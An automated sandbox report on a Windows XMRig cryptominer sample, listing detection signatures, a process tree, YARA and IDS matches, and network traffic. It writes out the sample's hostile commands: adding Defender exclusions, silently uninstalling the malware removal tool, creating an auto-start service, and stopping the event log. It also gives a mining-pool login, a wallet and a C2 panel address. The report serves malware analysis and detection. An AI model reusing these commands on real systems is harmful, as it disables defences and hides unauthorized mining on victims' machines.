Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exe

Overview

General Information

Sample name:SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exe
Analysis ID:1504973
MD5:6424419ac4c6f0a24c95233e527c1e8a
SHA1:deae1c236a839075f13c2f5f0a32fd123b0e0d4d
SHA256:8c53149f0180a2d3d0c7b2b481c78d9dc0f88270c8506b5dd62eaf115a17e98d
Tags:exe
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Stop EventLog
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Detected Stratum mining protocol
Found strings related to Crypto-Mining
Loading BitLocker PowerShell Module
Modifies the context of a thread in another process (thread injection)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspect Svchost Activity
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
AV process strings found (often used to terminate AV products)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exe (PID: 5340 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exe" MD5: 6424419AC4C6F0A24C95233E527C1E8A)
    • powershell.exe (PID: 6456 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5456 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 4332 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • sc.exe (PID: 7064 cmdline: C:\Windows\system32\sc.exe delete "PHVUTTIO" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 4160 cmdline: C:\Windows\system32\sc.exe create "PHVUTTIO" binpath= "C:\ProgramData\utblsmnncewd\bbecxurdegum.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6980 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 5572 cmdline: C:\Windows\system32\sc.exe start "PHVUTTIO" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • bbecxurdegum.exe (PID: 5248 cmdline: C:\ProgramData\utblsmnncewd\bbecxurdegum.exe MD5: 6424419AC4C6F0A24C95233E527C1E8A)
    • powershell.exe (PID: 6788 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6756 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 2820 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • conhost.exe (PID: 6056 cmdline: C:\Windows\system32\conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • svchost.exe (PID: 3920 cmdline: svchost.exe MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 6984 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000017.00000002.3317696195.0000000140001000.00000040.00000001.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      00000017.00000002.3317696195.0000000140001000.00000040.00000001.00020000.00000000.sdmpMacOS_Cryptominer_Xmrig_241780a1unknownunknown
      • 0x36fc08:$a1: mining.set_target
      • 0x361e30:$a2: XMRIG_HOSTNAME
      • 0x3647a8:$a3: Usage: xmrig [OPTIONS]
      • 0x361e08:$a4: XMRIG_VERSION
      Process Memory Space: svchost.exe PID: 3920JoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        Process Memory Space: svchost.exe PID: 3920MacOS_Cryptominer_Xmrig_241780a1unknownunknown
        • 0x52b56:$a1: mining.set_target
        • 0x4f27e:$a2: XMRIG_HOSTNAME
        • 0x50070:$a3: Usage: xmrig [OPTIONS]
        • 0x4f25f:$a4: XMRIG_VERSION
        SourceRuleDescriptionAuthorStrings
        23.2.svchost.exe.140000000.0.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          23.2.svchost.exe.140000000.0.unpackMacOS_Cryptominer_Xmrig_241780a1unknownunknown
          • 0x370008:$a1: mining.set_target
          • 0x362230:$a2: XMRIG_HOSTNAME
          • 0x364ba8:$a3: Usage: xmrig [OPTIONS]
          • 0x362208:$a4: XMRIG_VERSION
          23.2.svchost.exe.140000000.0.unpackMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
          • 0x3b5761:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
          23.2.svchost.exe.140000000.0.unpackMALWARE_Win_CoinMiner02Detects coinmining malwareditekSHen
          • 0x3b5fd8:$s1: %s/%s (Windows NT %lu.%lu
          • 0x3b9600:$s3: \\.\WinRing0_
          • 0x3671a8:$s4: pool_wallet
          • 0x3615d8:$s5: cryptonight
          • 0x3615e8:$s5: cryptonight
          • 0x3615f8:$s5: cryptonight
          • 0x361608:$s5: cryptonight
          • 0x361620:$s5: cryptonight
          • 0x361630:$s5: cryptonight
          • 0x361640:$s5: cryptonight
          • 0x361658:$s5: cryptonight
          • 0x361668:$s5: cryptonight
          • 0x361680:$s5: cryptonight
          • 0x361698:$s5: cryptonight
          • 0x3616a8:$s5: cryptonight
          • 0x3616b8:$s5: cryptonight
          • 0x3616c8:$s5: cryptonight
          • 0x3616e0:$s5: cryptonight
          • 0x3616f8:$s5: cryptonight
          • 0x361708:$s5: cryptonight
          • 0x361718:$s5: cryptonight

          System Summary

          barindex
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exe, ParentProcessId: 5340, ParentProcessName: SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 6456, ProcessName: powershell.exe
          Source: Process startedAuthor: David Burkett, @signalblur: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\ProgramData\utblsmnncewd\bbecxurdegum.exe, ParentImage: C:\ProgramData\utblsmnncewd\bbecxurdegum.exe, ParentProcessId: 5248, ParentProcessName: bbecxurdegum.exe, ProcessCommandLine: svchost.exe, ProcessId: 3920, ProcessName: svchost.exe
          Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 141.94.96.71, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Windows\System32\svchost.exe, Initiated: true, ProcessId: 3920, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49704
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exe, ParentProcessId: 5340, ParentProcessName: SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 6456, ProcessName: powershell.exe
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\ProgramData\utblsmnncewd\bbecxurdegum.exe, ParentImage: C:\ProgramData\utblsmnncewd\bbecxurdegum.exe, ParentProcessId: 5248, ParentProcessName: bbecxurdegum.exe, ProcessCommandLine: svchost.exe, ProcessId: 3920, ProcessName: svchost.exe
          Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "PHVUTTIO" binpath= "C:\ProgramData\utblsmnncewd\bbecxurdegum.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "PHVUTTIO" binpath= "C:\ProgramData\utblsmnncewd\bbecxurdegum.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exe, ParentProcessId: 5340, ParentProcessName: SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "PHVUTTIO" binpath= "C:\ProgramData\utblsmnncewd\bbecxurdegum.exe" start= "auto", ProcessId: 4160, ProcessName: sc.exe
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exe, ParentProcessId: 5340, ParentProcessName: SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 6456, ProcessName: powershell.exe
          Source: Process startedAuthor: vburov: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\ProgramData\utblsmnncewd\bbecxurdegum.exe, ParentImage: C:\ProgramData\utblsmnncewd\bbecxurdegum.exe, ParentProcessId: 5248, ParentProcessName: bbecxurdegum.exe, ProcessCommandLine: svchost.exe, ProcessId: 3920, ProcessName: svchost.exe

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exe, ParentProcessId: 5340, ParentProcessName: SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 6980, ProcessName: sc.exe
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-09-05T16:25:06.413438+020020479282Crypto Currency Mining Activity Detected192.168.2.5610151.1.1.153UDP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-09-05T16:25:08.184137+020020510042Crypto Currency Mining Activity Detected192.168.2.549705195.10.205.25380TCP
          2024-09-05T16:26:07.213120+020020510042Crypto Currency Mining Activity Detected192.168.2.549715195.10.205.25380TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-09-05T16:25:01.830482+020028269302Crypto Currency Mining Activity Detected192.168.2.549704141.94.96.718080TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: C:\ProgramData\utblsmnncewd\bbecxurdegum.exeReversingLabs: Detection: 76%
          Source: SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exeReversingLabs: Detection: 76%
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.9% probability

          Bitcoin Miner

          barindex
          Source: Yara matchFile source: dump.pcap, type: PCAP
          Source: Yara matchFile source: 23.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000017.00000002.3317696195.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3920, type: MEMORYSTR
          Source: global trafficTCP traffic: 192.168.2.5:49704 -> 141.94.96.71:8080 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"4335mezgwwsmbw161uqp6waqyxztrvxwsbpkzpxtxxah4mtoxxbierhgbab8xhdzaemkwwvnp49wwk5ribj37ak2azkaekr","pass":"x","agent":"xmrig/6.21.3 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2022","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}.
          Source: svchost.exe, 00000017.00000002.3317696195.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
          Source: svchost.exeString found in binary or memory: cryptonight/0
          Source: svchost.exe, 00000017.00000002.3317696195.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: -o, --url=URL URL of mining server
          Source: svchost.exe, 00000017.00000002.3317696195.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
          Source: svchost.exe, 00000017.00000002.3317696195.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
          Source: svchost.exe, 00000017.00000002.3317696195.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
          Source: SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: bbecxurdegum.exe, 00000010.00000003.2132571652.000001A0F42E0000.00000004.00000001.00020000.00000000.sdmp, clwjpwuuvdte.sys.16.dr
          Source: global trafficTCP traffic: 192.168.2.5:49704 -> 141.94.96.71:8080
          Source: Joe Sandbox ViewIP Address: 141.94.96.71 141.94.96.71
          Source: Joe Sandbox ViewASN Name: TSSCOM-ASRU TSSCOM-ASRU
          Source: Joe Sandbox ViewASN Name: DFNVereinzurFoerderungeinesDeutschenForschungsnetzese DFNVereinzurFoerderungeinesDeutschenForschungsnetzese
          Source: Network trafficSuricata IDS: 2047928 - Severity 2 - ET MALWARE CoinMiner Domain in DNS Lookup (pool .supportxmr .com) : 192.168.2.5:61015 -> 1.1.1.1:53
          Source: Network trafficSuricata IDS: 2051004 - Severity 2 - ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request : 192.168.2.5:49705 -> 195.10.205.253:80
          Source: Network trafficSuricata IDS: 2051004 - Severity 2 - ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request : 192.168.2.5:49715 -> 195.10.205.253:80
          Source: Network trafficSuricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.2.5:49704 -> 141.94.96.71:8080
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficDNS traffic detected: DNS query: pool.supportxmr.com
          Source: unknownHTTP traffic detected: POST /panel/api/endpoint.php HTTP/1.1Accept: */*Connection: closeContent-Length: 482Content-Type: application/jsonHost: 195.10.205.253User-Agent: cpp-httplib/0.12.6
          Source: svchost.exe, 00000017.00000002.3318673815.000002107342F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.3318737467.0000021073480000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://195.10.205.253/panel/api/endpoint.php
          Source: svchost.exe, 00000017.00000002.3318673815.000002107342F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://195.10.205.253/panel/api/endpoint.php--cinit-version=3.4.1--cinit-idle-wait=15--cinit-idle-cp
          Source: svchost.exe, 00000017.00000003.2133808985.000002107346B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://195.10.205.253/panel/api/endpoint.phpmcqqajuoiblhnzuh
          Source: bbecxurdegum.exe, 00000010.00000003.2132571652.000001A0F42E0000.00000004.00000001.00020000.00000000.sdmp, clwjpwuuvdte.sys.16.drString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
          Source: bbecxurdegum.exe, 00000010.00000003.2132571652.000001A0F42E0000.00000004.00000001.00020000.00000000.sdmp, clwjpwuuvdte.sys.16.drString found in binary or memory: http://crl.globalsign.net/Root.crl0
          Source: bbecxurdegum.exe, 00000010.00000003.2132571652.000001A0F42E0000.00000004.00000001.00020000.00000000.sdmp, clwjpwuuvdte.sys.16.drString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
          Source: bbecxurdegum.exe, 00000010.00000003.2132571652.000001A0F42E0000.00000004.00000001.00020000.00000000.sdmp, clwjpwuuvdte.sys.16.drString found in binary or memory: http://crl.globalsign.net/primobject.crl0
          Source: svchost.exe, 00000017.00000002.3317696195.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/docs/algorithms

          System Summary

          barindex
          Source: 23.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
          Source: 23.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
          Source: 23.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
          Source: 00000017.00000002.3317696195.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
          Source: Process Memory Space: svchost.exe PID: 3920, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exeCode function: 0_2_00007FF7CA381394 NtAllocateVirtualMemoryEx,0_2_00007FF7CA381394
          Source: C:\ProgramData\utblsmnncewd\bbecxurdegum.exeCode function: 16_2_00007FF7794E1394 NtModifyBootEntry,16_2_00007FF7794E1394
          Source: C:\Windows\System32\conhost.exeCode function: 20_2_0000000140001394 NtAlpcQueryInformationMessage,20_2_0000000140001394
          Source: C:\ProgramData\utblsmnncewd\bbecxurdegum.exeFile created: C:\Windows\TEMP\clwjpwuuvdte.sysJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\__PSScriptPolicyTest_ingxpkfp.uhv.ps1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exeCode function: 0_2_00007FF7CA383B500_2_00007FF7CA383B50
          Source: C:\ProgramData\utblsmnncewd\bbecxurdegum.exeCode function: 16_2_00007FF7794E3B5016_2_00007FF7794E3B50
          Source: C:\Windows\System32\conhost.exeCode function: 20_2_000000014000315020_2_0000000140003150
          Source: C:\Windows\System32\conhost.exeCode function: 20_2_00000001400026E020_2_00000001400026E0
          Source: Joe Sandbox ViewDropped File: C:\Windows\Temp\clwjpwuuvdte.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exeCode function: String function: 00007FF7CA381394 appears 33 times
          Source: C:\ProgramData\utblsmnncewd\bbecxurdegum.exeCode function: String function: 00007FF7794E1394 appears 33 times
          Source: 23.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
          Source: 23.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
          Source: 23.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
          Source: 00000017.00000002.3317696195.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
          Source: Process Memory Space: svchost.exe PID: 3920, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
          Source: clwjpwuuvdte.sys.16.drBinary string: \Device\WinRing0_1_2_0
          Source: conhost.exe, 00000014.00000002.3317941795.00000183E6A80000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: KsN=}cV,we[WyL.vbPy=HMAg+IYydC,i.%^Z}Xvw"0NvENOA_vz~LJt-dKOaPcQ~S)]]_hQKcI|eTBYmmV(I9T[y+g
          Source: classification engineClassification label: mal100.evad.mine.winEXE@35/12@1/2
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3692:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6976:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7056:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5888:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2820:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5656:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6404:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5952:120:WilError_03
